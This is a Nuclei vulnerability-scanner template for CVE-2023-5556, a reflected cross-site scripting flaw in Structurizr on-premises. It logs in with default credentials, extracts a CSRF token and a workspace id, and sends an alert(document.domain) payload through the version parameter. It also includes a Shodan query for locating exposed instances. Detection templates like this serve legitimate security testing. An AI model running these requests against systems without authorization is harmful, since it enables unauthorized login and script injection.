nuclei-templates/http/cves/2023/CVE-2023-5556.yaml

101 lines
2.7 KiB
YAML

id: CVE-2023-5556
info:
name: Structurizr on-premises - Cross Site Scripting
author: shankaracharya
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.
remediation: |
Apply the latest security patches or updates provided by Structurizr to fix the XSS vulnerability.
reference:
- https://huntr.com/bounties/a3ee0f98-6898-41ae-b1bd-242a03a73d1b/
- https://github.com/structurizr/onpremises/commit/6cff4f792b010dfb1ff6a0b4ae1c6e398f8f8a18
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-5556
cwe-id: CWE-79
epss-score: 0.00064
epss-percentile: 0.2616
cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:*
metadata:
max-request: 5
vendor: structurizr
product: on-premises_installation
shodan-query: http.favicon.hash:1199592666
tags: cve,cve2023,xss,structurizr,oos,authenticated
variables:
str: "{{randstr}}"
http:
- raw:
- |
GET /signin HTTP/1.1
Host: {{Hostname}}
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&_csrf={{csrf}}&hash=
- |
GET /dashboard HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
GET /workspace/create HTTP/1.1
Host: {{Hostname}}
- |
GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
- "structurizr"
password:
- "password"
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- '<a href="/dashboard">'
- 'Sign out'
condition: and
- type: word
part: body_5
words:
- '");alert(document.domain);//'
- 'Structurizr'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="_csrf" value="([0-9a-z-]+)"'
internal: true
- type: regex
name: workspace
group: 1
part: header
regex:
- '\/workspace\/([0-9]+)\?scriptNonce='
internal: true
# digest: 4a0a00473045022016c9116f5d08d434ce63ecbeba018da6e0eda0406d850137ee0484bb78ab66c0022100a54b3fecb6fb2faa1f50ebd5b81530b98efb8d0338ab7ec8716bc2861992c836:922c64590222798bb761d5b6d8e72950